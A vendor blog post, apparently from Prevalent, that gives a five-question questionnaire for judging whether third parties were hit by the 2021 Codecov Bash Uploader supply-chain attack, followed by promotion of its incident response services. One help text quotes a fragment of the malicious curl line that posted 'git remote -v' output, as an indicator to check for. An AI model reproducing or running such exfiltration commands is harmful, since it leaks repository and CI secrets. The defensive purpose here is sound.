In my previous post, we discussed the Codecov breach and its potential impact on enterprises worldwide. By way of background, on April 15, 2021 Codecov warned its customers that hackers had introduced a backdoor in the Bash Uploader script starting on January 31, 2021. The hackers exploited a flawed Docker image creation process to replace Codecov’s IP address with theirs. This exploit allowed them to post users’ information to their servers.
With approximately 29,000 companies using Codecov’s development tools, it is possible that some of your third parties are too. Therefore, it is essential that you assess the potential impact to your third parties so you can mitigate the possible exposure of your company’s data. Prevalent has curated a 5-question assessment that can be leveraged to rapidly identify any potential impacts to your business by determining which of your third parties was affected and what actions they are taking.
Questions | Potential Responses |
---|---|
1) Does the organization utilize any of the following uploaders? (Please select all that apply.) Help text: Specified uploaders relate only to Codecov. |
a) Codecov-actions uploader for GitHub |
2) If so, has the organization been impacted by the recent Codecov supply chain attack? (Please select one.) Help text: Significant impact: The cyber attack has caused systems or infrastructure to stop working or become unavailable. There has been a loss of confidentiality or integrity of data. High impact: Service availability has been periodically lost, and there is the potential for some systems to periodically stop. Some loss of confidentiality or integrity of data. Low impact: No loss of confidentiality or integrity of data; minimal or no disruption to service availability. |
a) There has been significant impact. |
3) Following the guidance of Codecov, has the organization taken the following actions? (Please select all that apply.) Help text: Organizations can determine the keys and tokens that are surfaced to the CI environment by running the env command in the organization's CI pipeline. If anything returned from that command is considered private or sensitive, Codecov recommends invalidating the credential and generating a new one. |
a) Re-roll of all credentials located in the environment variables in our CI processes that used one of Codecov’s Bash Uploaders. |
4) Has the organization replaced the bash files used with the most recent version available from Codecov? (Please select one.) Help text: Any organization that uses a locally stored version of a Bash Uploader should check that version for the following: curl -sm 0.5 -d “$(git remote -v) If this appears anywhere in the locally stored Bash Uploader, the organization should immediately replace the bash files with the most recent version from https://codecov.io/bash |
a) Yes, we have updated our version of Bash files with the most recent from Codecov |
5) Has the supply chain attack exposed any customer sensitive information? (Please select all that apply.) Help text: Customer sensitive information is defined as any material that can have a detrimental impact to the customer if exposed to unauthorized parties. Impacts can vary from, but are not limited to, reputational damage, financial penalties, loss of earnings, or loss of competitive advantage. |
a) Yes, an ongoing investigation is identifying the level of exposure. |
Free Guide: 8 Steps to a Third-Party Incident Response Plan
When one of your critical vendors is breached, being ready with a prescriptive incident response plan is essential to preventing your company from becoming the next victim.
Prevalent recently introduced the Third-Party Incident Response Service, a solution that helps to rapidly identify and mitigate the impact of supply chain breaches like the Codecov attack by providing a platform to centrally manage vendors, conduct targeted event-specific assessments, score identified risks, and access remediation guidance. Prevalent offers this solution as a managed service to enable your team to offload the collection of critical response data so they can focus on remediating risks instead.
Complementing the Incident Response Service is Prevalent’s continuous cyber and business breach monitoring that provides regular updates on breach disclosures, adverse news events, and cyber incidents such as malicious dark web activity about your vendors.
Together, these solutions help to automate breach impact discovery and accelerate response.
Use this questionnaire to determine the impact the Codecov attack could have on your supplier ecosystem. And, learn more by downloading a best practices white paper or contact us for a demo!
Effectively manage third-party cybersecurity incidents with a well-defined incident response plan.
09/24/2024
Why third-party breaches are on the rise, who is being affected, and what you can do...
09/20/2024
Use these 6 tips to improve your third-party breach response procedures.
09/17/2024